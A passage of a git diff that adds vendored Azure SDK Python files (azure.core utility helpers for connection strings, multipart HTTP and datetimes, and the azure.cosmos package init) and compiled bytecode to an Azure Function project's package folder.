`case_sensitive_keys=False`), then a dict with LOWERCASE KEYS will be returned. + + :param str conn_str: String with connection details provided by Azure services. + :param bool case_sensitive_keys: Indicates whether the casing of the keys will be preserved. When `False`(the + default), all keys will be lower-cased. If set to `True`, the original casing of the keys will be preserved. + :rtype: Mapping + :raises: + ValueError: if each key in conn_str does not have a corresponding value and + for other bad formatting of connection strings - including duplicate + args, bad syntax, etc. + """ + + cs_args = [s.split("=", 1) for s in conn_str.strip().rstrip(";").split(";")] + if any(len(tup) != 2 or not all(tup) for tup in cs_args): + raise ValueError("Connection string is either blank or malformed.") + args_dict = dict(cs_args) # type: ignore + + if len(cs_args) != len(args_dict): + raise ValueError("Connection string is either blank or malformed.") + + if not case_sensitive_keys: + # if duplicate case insensitive keys are passed in, raise error + new_args_dict = {} + for key in args_dict.keys(): + new_key = key.lower() + if new_key in new_args_dict: + raise ValueError( + "Duplicate key in connection string: {}".format(new_key) + ) + new_args_dict[new_key] = args_dict[key] + return new_args_dict + + return args_dict diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/_messaging_shared.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/_messaging_shared.py new file mode 100644 index 0000000..960848e --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/_messaging_shared.py @@ -0,0 +1,41 @@ +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- + +# ========================================================================== +# This file contains duplicate code that is shared with azure-eventgrid. +# Both the files should always be identical. +# ========================================================================== + + + +import json +from azure.core.exceptions import raise_with_traceback + +def _get_json_content(obj): + """Event mixin to have methods that are common to different Event types + like CloudEvent, EventGridEvent etc. + """ + msg = "Failed to load JSON content from the object." + try: + # storage queue + return json.loads(obj.content) + except ValueError as err: + raise_with_traceback(ValueError, msg, err) + except AttributeError: + # eventhubs + try: + return json.loads(next(obj.body))[0] + except KeyError: + # servicebus + return json.loads(next(obj.body)) + except ValueError as err: + raise_with_traceback(ValueError, msg, err) + except: # pylint: disable=bare-except + try: + return json.loads(obj) + except ValueError as err: + raise_with_traceback(ValueError, msg, err) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/_pipeline_transport_rest_shared.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/_pipeline_transport_rest_shared.py new file mode 100644 index 0000000..2c1b6fc --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/_pipeline_transport_rest_shared.py @@ -0,0 +1,363 @@ +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- +from __future__ import absolute_import + +from io import BytesIO +from email.message import Message + +try: + from email import message_from_bytes as message_parser +except ImportError: # 2.7 + from email import message_from_string as message_parser # type: ignore +import os +from typing import TYPE_CHECKING, cast, IO + +from six.moves.http_client import HTTPConnection + +try: + binary_type = str + from urlparse import urlparse # type: ignore +except ImportError: + binary_type = bytes # type: ignore + from urllib.parse import urlparse + +from ..pipeline import ( + PipelineRequest, + PipelineResponse, + PipelineContext, +) +from ..pipeline._tools import await_result as _await_result + +if TYPE_CHECKING: + from typing import ( # pylint: disable=ungrouped-imports + Dict, + List, + Union, + Tuple, + Optional, + Callable, + Type, + Iterator, + ) + # importing both the py3 RestHttpRequest and the fallback RestHttpRequest + from azure.core.rest._rest_py3 import HttpRequest as RestHttpRequestPy3 + from azure.core.rest._rest import HttpRequest as RestHttpRequestPy2 + from azure.core.pipeline.transport import ( + HttpRequest as PipelineTransportHttpRequest + ) + HTTPRequestType = Union[ + RestHttpRequestPy3, RestHttpRequestPy2, PipelineTransportHttpRequest + ] + from ..pipeline.policies import SansIOHTTPPolicy + from azure.core.pipeline.transport import ( + HttpResponse as PipelineTransportHttpResponse, + AioHttpTransportResponse as PipelineTransportAioHttpTransportResponse, + ) + from azure.core.pipeline.transport._base import ( + _HttpResponseBase as PipelineTransportHttpResponseBase + ) + +class BytesIOSocket(object): + """Mocking the "makefile" of socket for HTTPResponse. + This can be used to create a http.client.HTTPResponse object + based on bytes and not a real socket. + """ + + def __init__(self, bytes_data): + self.bytes_data = bytes_data + + def makefile(self, *_): + return BytesIO(self.bytes_data) + +def _format_parameters_helper(http_request, params): + """Helper for format_parameters. + + Format parameters into a valid query string. + It's assumed all parameters have already been quoted as + valid URL strings. + + :param http_request: The http request whose parameters + we are trying to format + :param dict params: A dictionary of parameters. + """ + query = urlparse(http_request.url).query + if query: + http_request.url = http_request.url.partition("?")[0] + existing_params = { + p[0]: p[-1] for p in [p.partition("=") for p in query.split("&")] + } + params.update(existing_params) + query_params = [] + for k, v in params.items(): + if isinstance(v, list): + for w in v: + if w is None: + raise ValueError("Query parameter {} cannot be None".format(k)) + query_params.append("{}={}".format(k, w)) + else: + if v is None: + raise ValueError("Query parameter {} cannot be None".format(k)) + query_params.append("{}={}".format(k, v)) + query = "?" + "&".join(query_params) + http_request.url = http_request.url + query + +def _pad_attr_name(attr, backcompat_attrs): + # type: (str, List[str]) -> str + """Pad hidden attributes so users can access them. + + Currently, for our backcompat attributes, we define them + as private, so they're hidden from intellisense and sphinx, + but still allow users to access them as public attributes + for backcompat purposes. This function is called so if + users access publicly call a private backcompat attribute, + we can return them the private variable in getattr + """ + return "_{}".format(attr) if attr in backcompat_attrs else attr + +def _prepare_multipart_body_helper(http_request, content_index=0): + # type: (HTTPRequestType, int) -> int + """Helper for prepare_multipart_body. + + Will prepare the body of this request according to the multipart information. + + This call assumes the on_request policies have been applied already in their + correct context (sync/async) + + Does nothing if "set_multipart_mixed" was never called. + :param http_request: The http request whose multipart body we are trying + to prepare + :param int content_index: The current index of parts within the batch message. + :returns: The updated index after all parts in this request have been added. + :rtype: int + """ + if not http_request.multipart_mixed_info: + return 0 + + requests = http_request.multipart_mixed_info[0] # type: List[HTTPRequestType] + boundary = http_request.multipart_mixed_info[2] # type: Optional[str] + + # Update the main request with the body + main_message = Message() + main_message.add_header("Content-Type", "multipart/mixed") + if boundary: + main_message.set_boundary(boundary) + + for req in requests: + part_message = Message() + if req.multipart_mixed_info: + content_index = req.prepare_multipart_body(content_index=content_index) + part_message.add_header("Content-Type", req.headers['Content-Type']) + payload = req.serialize() + # We need to remove the ~HTTP/1.1 prefix along with the added content-length + payload = payload[payload.index(b'--'):] + else: + part_message.add_header("Content-Type", "application/http") + part_message.add_header("Content-Transfer-Encoding", "binary") + part_message.add_header("Content-ID", str(content_index)) + payload = req.serialize() + content_index += 1 + part_message.set_payload(payload) + main_message.attach(part_message) + + try: + from email.policy import HTTP + + full_message = main_message.as_bytes(policy=HTTP) + eol = b"\r\n" + except ImportError: # Python 2.7 + # Right now we decide to not support Python 2.7 on serialization, since + # it doesn't serialize a valid HTTP request (and our main scenario Storage refuses it) + raise NotImplementedError( + "Multipart request are not supported on Python 2.7" + ) + # full_message = main_message.as_string() + # eol = b'\n' + _, _, body = full_message.split(eol, 2) + http_request.set_bytes_body(body) + http_request.headers["Content-Type"] = ( + "multipart/mixed; boundary=" + main_message.get_boundary() + ) + return content_index + +class _HTTPSerializer(HTTPConnection, object): + """Hacking the stdlib HTTPConnection to serialize HTTP request as strings. + """ + + def __init__(self, *args, **kwargs): + self.buffer = b"" + kwargs.setdefault("host", "fakehost") + super(_HTTPSerializer, self).__init__(*args, **kwargs) + + def putheader(self, header, *values): + if header in ["Host", "Accept-Encoding"]: + return + super(_HTTPSerializer, self).putheader(header, *values) + + def send(self, data): + self.buffer += data + +def _serialize_request(http_request): + # type: (HTTPRequestType) -> bytes + """Helper for serialize. + + Serialize a request using the application/http spec/ + + :param http_request: The http request which we are trying + to serialize. + :rtype: bytes + """ + serializer = _HTTPSerializer() + serializer.request( + method=http_request.method, + url=http_request.url, + body=http_request.body, + headers=http_request.headers, + ) + return serializer.buffer + +def _decode_parts_helper( + response, # type: PipelineTransportHttpResponseBase + message, # type: Message + http_response_type, # type: Type[PipelineTransportHttpResponseBase] + requests, # type: List[PipelineTransportHttpRequest] + deserialize_response # type: Callable +): + # type: (...) -> List[PipelineTransportHttpResponse] + """Helper for _decode_parts. + + Rebuild an HTTP response from pure string. + """ + responses = [] + for index, raw_reponse in enumerate(message.get_payload()): + content_type = raw_reponse.get_content_type() + if content_type == "application/http": + responses.append( + deserialize_response( + raw_reponse.get_payload(decode=True), + requests[index], + http_response_type=http_response_type, + ) + ) + elif content_type == "multipart/mixed" and requests[index].multipart_mixed_info: + # The message batch contains one or more change sets + changeset_requests = requests[index].multipart_mixed_info[0] # type: ignore + changeset_responses = response._decode_parts(raw_reponse, http_response_type, changeset_requests) # pylint: disable=protected-access + responses.extend(changeset_responses) + else: + raise ValueError( + "Multipart doesn't support part other than application/http for now" + ) + return responses + +def _get_raw_parts_helper(response, http_response_type): + """Helper for _get_raw_parts + + Assuming this body is multipart, return the iterator or parts. + + If parts are application/http use http_response_type or HttpClientTransportResponse + as enveloppe. + """ + body_as_bytes = response.body() + # In order to use email.message parser, I need full HTTP bytes. Faking something to make the parser happy + http_body = ( + b"Content-Type: " + + response.content_type.encode("ascii") + + b"\r\n\r\n" + + body_as_bytes + ) + message = message_parser(http_body) # type: Message + requests = response.request.multipart_mixed_info[0] + return response._decode_parts(message, http_response_type, requests) # pylint: disable=protected-access + +def _parts_helper(response): + # type: (PipelineTransportHttpResponse) -> Iterator[PipelineTransportHttpResponse] + """Assuming the content-type is multipart/mixed, will return the parts as an iterator. + + :rtype: iterator[HttpResponse] + :raises ValueError: If the content is not multipart/mixed + """ + if not response.content_type or not response.content_type.startswith("multipart/mixed"): + raise ValueError( + "You can't get parts if the response is not multipart/mixed" + ) + + responses = response._get_raw_parts() # pylint: disable=protected-access + if response.request.multipart_mixed_info: + policies = response.request.multipart_mixed_info[1] # type: List[SansIOHTTPPolicy] + + # Apply on_response concurrently to all requests + import concurrent.futures + + def parse_responses(response): + http_request = response.request + context = PipelineContext(None) + pipeline_request = PipelineRequest(http_request, context) + pipeline_response = PipelineResponse( + http_request, response, context=context + ) + + for policy in policies: + _await_result(policy.on_response, pipeline_request, pipeline_response) + + with concurrent.futures.ThreadPoolExecutor() as executor: + # List comprehension to raise exceptions if happened + [ # pylint: disable=expression-not-assigned, unnecessary-comprehension + _ for _ in executor.map(parse_responses, responses) + ] + + return responses + +def _format_data_helper(data): + # type: (Union[str, IO]) -> Union[Tuple[None, str], Tuple[Optional[str], IO, str]] + """Helper for _format_data. + + Format field data according to whether it is a stream or + a string for a form-data request. + + :param data: The request field data. + :type data: str or file-like object. + """ + if hasattr(data, "read"): + data = cast(IO, data) + data_name = None + try: + if data.name[0] != "<" and data.name[-1] != ">": + data_name = os.path.basename(data.name) + except (AttributeError, TypeError): + pass + return (data_name, data, "application/octet-stream") + return (None, cast(str, data)) + +def _aiohttp_body_helper(response): + # pylint: disable=protected-access + # type: (PipelineTransportAioHttpTransportResponse) -> bytes + """Helper for body method of Aiohttp responses. + + Since aiohttp body methods need decompression work synchronously, + need to share thid code across old and new aiohttp transport responses + for backcompat. + + :rtype: bytes + """ + if response._content is None: + raise ValueError("Body is not available. Call async method load_body, or do your call with stream=False.") + if not response._decompress: + return response._content + if response._decompressed_content: + return response._content + enc = response.headers.get('Content-Encoding') + if not enc: + return response._content + enc = enc.lower() + if enc in ("gzip", "deflate"): + import zlib + zlib_mode = 16 + zlib.MAX_WBITS if enc == "gzip" else zlib.MAX_WBITS + decompressor = zlib.decompressobj(wbits=zlib_mode) + response._content = decompressor.decompress(response._content) + response._decompressed_content = True + return response._content + return response._content diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/_pipeline_transport_rest_shared_async.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/_pipeline_transport_rest_shared_async.py new file mode 100644 index 0000000..529e278 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/_pipeline_transport_rest_shared_async.py @@ -0,0 +1,63 @@ +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- +import asyncio +from collections.abc import AsyncIterator +from typing import TYPE_CHECKING, Any +from ..pipeline import PipelineContext, PipelineRequest, PipelineResponse +from ..pipeline._tools_async import await_result as _await_result + +if TYPE_CHECKING: + from typing import List + from ..pipeline.policies import SansIOHTTPPolicy + +class _PartGenerator(AsyncIterator): + """Until parts is a real async iterator, wrap the sync call. + + :param parts: An iterable of parts + """ + + def __init__(self, response, default_http_response_type: Any) -> None: + self._response = response + self._parts = None + self._default_http_response_type = default_http_response_type + + async def _parse_response(self): + responses = self._response._get_raw_parts( # pylint: disable=protected-access + http_response_type=self._default_http_response_type + ) + if self._response.request.multipart_mixed_info: + policies = self._response.request.multipart_mixed_info[ + 1 + ] # type: List[SansIOHTTPPolicy] + + async def parse_responses(response): + http_request = response.request + context = PipelineContext(None) + pipeline_request = PipelineRequest(http_request, context) + pipeline_response = PipelineResponse( + http_request, response, context=context + ) + + for policy in policies: + await _await_result( + policy.on_response, pipeline_request, pipeline_response + ) + + # Not happy to make this code asyncio specific, but that's multipart only for now + # If we need trio and multipart, let's reinvesitgate that later + await asyncio.gather(*[parse_responses(res) for res in responses]) + + return responses + + async def __anext__(self): + if not self._parts: + self._parts = iter(await self._parse_response()) + + try: + return next(self._parts) + except StopIteration: + raise StopAsyncIteration() diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/_utils.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/_utils.py new file mode 100644 index 0000000..20785bb --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/core/utils/_utils.py @@ -0,0 +1,112 @@ +# coding=utf-8 +# -------------------------------------------------------------------------- +# Copyright (c) Microsoft Corporation. All rights reserved. +# Licensed under the MIT License. See License.txt in the project root for +# license information. +# -------------------------------------------------------------------------- +import datetime +from typing import Any, MutableMapping + + +class _FixedOffset(datetime.tzinfo): + """Fixed offset in minutes east from UTC. + + Copy/pasted from Python doc + + :param int offset: offset in minutes + """ + + def __init__(self, offset): + self.__offset = datetime.timedelta(minutes=offset) + + def utcoffset(self, dt): + return self.__offset + + def tzname(self, dt): + return str(self.__offset.total_seconds() / 3600) + + def __repr__(self): + return "".format(self.tzname(None)) + + def dst(self, dt): + return datetime.timedelta(0) + + +try: + from datetime import timezone + + TZ_UTC = timezone.utc # type: ignore +except ImportError: + TZ_UTC = _FixedOffset(0) # type: ignore + + +def _convert_to_isoformat(date_time): + """Deserialize a date in RFC 3339 format to datetime object. + Check https://tools.ietf.org/html/rfc3339#section-5.8 for examples. + """ + if not date_time: + return None + if date_time[-1] == "Z": + delta = 0 + timestamp = date_time[:-1] + else: + timestamp = date_time[:-6] + sign, offset = date_time[-6], date_time[-5:] + delta = int(sign + offset[:1]) * 60 + int(sign + offset[-2:]) + + check_decimal = timestamp.split('.') + if len(check_decimal) > 1: + decimal_str = "" + for digit in check_decimal[1]: + if digit.isdigit(): + decimal_str += digit + else: + break + if len(decimal_str) > 6: + timestamp = timestamp.replace(decimal_str, decimal_str[0:6]) + + if delta == 0: + tzinfo = TZ_UTC + else: + try: + tzinfo = datetime.timezone(datetime.timedelta(minutes=delta)) + except AttributeError: + tzinfo = _FixedOffset(delta) + + try: + deserialized = datetime.datetime.strptime(timestamp, "%Y-%m-%dT%H:%M:%S.%f") + except ValueError: + deserialized = datetime.datetime.strptime(timestamp, "%Y-%m-%dT%H:%M:%S") + + deserialized = deserialized.replace(tzinfo=tzinfo) + return deserialized + +def case_insensitive_dict(*args: Any, **kwargs: Any) -> MutableMapping: + """Return a case-insensitive mutable mapping from an inputted mapping structure. + + :return: A case-insensitive mutable mapping object. + :rtype: ~collections.abc.MutableMapping + """ + + # Rational is I don't want to re-implement this, but I don't want + # to assume "requests" or "aiohttp" are installed either. + # So I use the one from "requests" or the one from "aiohttp" ("multidict") + # If one day this library is used in an HTTP context without "requests" nor "aiohttp" installed, + # we can add "multidict" as a dependency or re-implement our own. + try: + from requests.structures import CaseInsensitiveDict + + return CaseInsensitiveDict(*args, **kwargs) + except ImportError: + pass + try: + # multidict is installed by aiohttp + from multidict import CIMultiDict + + if len(kwargs) == 0 and len(args) == 1 and (not args[0]): + return CIMultiDict() # in case of case_insensitive_dict(None), we don't want to raise exception + return CIMultiDict(*args, **kwargs) + except ImportError: + raise ValueError( + "Neither 'requests' or 'multidict' are installed and no case-insensitive dict impl have been found" + ) diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__init__.py b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__init__.py new file mode 100644 index 0000000..e19b458 --- /dev/null +++ b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__init__.py @@ -0,0 +1,66 @@ +# The MIT License (MIT) +# Copyright (c) 2014 Microsoft Corporation + +# Permission is hereby granted, free of charge, to any person obtaining a copy +# of this software and associated documentation files (the "Software"), to deal +# in the Software without restriction, including without limitation the rights +# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +# copies of the Software, and to permit persons to whom the Software is +# furnished to do so, subject to the following conditions: + +# The above copyright notice and this permission notice shall be included in all +# copies or substantial portions of the Software. + +# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE +# SOFTWARE. + +from ._version import VERSION +from ._retry_utility import ConnectionRetryPolicy +from .container import ContainerProxy +from .cosmos_client import CosmosClient +from .database import DatabaseProxy +from .user import UserProxy +from .scripts import ScriptsProxy +from .offer import Offer +from .documents import ( + ConsistencyLevel, + DataType, + IndexKind, + IndexingMode, + PermissionMode, + ProxyConfiguration, + SSLConfiguration, + TriggerOperation, + TriggerType, + DatabaseAccount, +) +from .partition_key import PartitionKey +from .permission import Permission + +__all__ = ( + "CosmosClient", + "DatabaseProxy", + "ContainerProxy", + "PartitionKey", + "Permission", + "ScriptsProxy", + "UserProxy", + "Offer", + "DatabaseAccount", + "ConsistencyLevel", + "DataType", + "IndexKind", + "IndexingMode", + "PermissionMode", + "ProxyConfiguration", + "SSLConfiguration", + "TriggerOperation", + "TriggerType", + "ConnectionRetryPolicy", +) +__version__ = VERSION diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/__init__.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/__init__.cpython-39.pyc new file mode 100644 index 0000000..fba7726 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/__init__.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_auth_policy.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_auth_policy.cpython-39.pyc new file mode 100644 index 0000000..1c0e623 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_auth_policy.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_base.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_base.cpython-39.pyc new file mode 100644 index 0000000..d311005 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_base.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_constants.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_constants.cpython-39.pyc new file mode 100644 index 0000000..732be0a Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_constants.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_cosmos_client_connection.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_cosmos_client_connection.cpython-39.pyc new file mode 100644 index 0000000..227ef7c Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_cosmos_client_connection.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_default_retry_policy.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_default_retry_policy.cpython-39.pyc new file mode 100644 index 0000000..3b81cda Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_default_retry_policy.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_endpoint_discovery_retry_policy.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_endpoint_discovery_retry_policy.cpython-39.pyc new file mode 100644 index 0000000..93be53d Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_endpoint_discovery_retry_policy.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_global_endpoint_manager.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_global_endpoint_manager.cpython-39.pyc new file mode 100644 index 0000000..3739fd9 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_global_endpoint_manager.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_gone_retry_policy.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_gone_retry_policy.cpython-39.pyc new file mode 100644 index 0000000..4beae8a Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_gone_retry_policy.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_location_cache.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_location_cache.cpython-39.pyc new file mode 100644 index 0000000..a0f8a4b Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_location_cache.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_partition.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_partition.cpython-39.pyc new file mode 100644 index 0000000..1e8e300 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_partition.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_query_iterable.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_query_iterable.cpython-39.pyc new file mode 100644 index 0000000..4f04adb Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_query_iterable.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_range.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_range.cpython-39.pyc new file mode 100644 index 0000000..98bb835 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_range.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_range_partition_resolver.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_range_partition_resolver.cpython-39.pyc new file mode 100644 index 0000000..36fff7b Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_range_partition_resolver.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_request_object.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_request_object.cpython-39.pyc new file mode 100644 index 0000000..ee1f072 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_request_object.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_resource_throttle_retry_policy.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_resource_throttle_retry_policy.cpython-39.pyc new file mode 100644 index 0000000..5a5d0d1 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_resource_throttle_retry_policy.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_retry_options.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_retry_options.cpython-39.pyc new file mode 100644 index 0000000..e4f8d65 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_retry_options.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_retry_utility.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_retry_utility.cpython-39.pyc new file mode 100644 index 0000000..f71cad8 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_retry_utility.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_runtime_constants.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_runtime_constants.cpython-39.pyc new file mode 100644 index 0000000..da32a2f Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_runtime_constants.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_session.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_session.cpython-39.pyc new file mode 100644 index 0000000..6768f7a Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_session.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_session_retry_policy.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_session_retry_policy.cpython-39.pyc new file mode 100644 index 0000000..7c12d13 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_session_retry_policy.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_synchronized_request.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_synchronized_request.cpython-39.pyc new file mode 100644 index 0000000..50483b8 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_synchronized_request.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_utils.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_utils.cpython-39.pyc new file mode 100644 index 0000000..6595b06 Binary files /dev/null and b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_utils.cpython-39.pyc differ diff --git a/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_vector_session_token.cpython-39.pyc b/modules/module-1/resources/azure_function/data/.python_packages/lib/site-packages/azure/cosmos/__pycache__/_vector_session_token.cpython-39.pyc new file mode 100644 index 0000000..73976a0 Binary 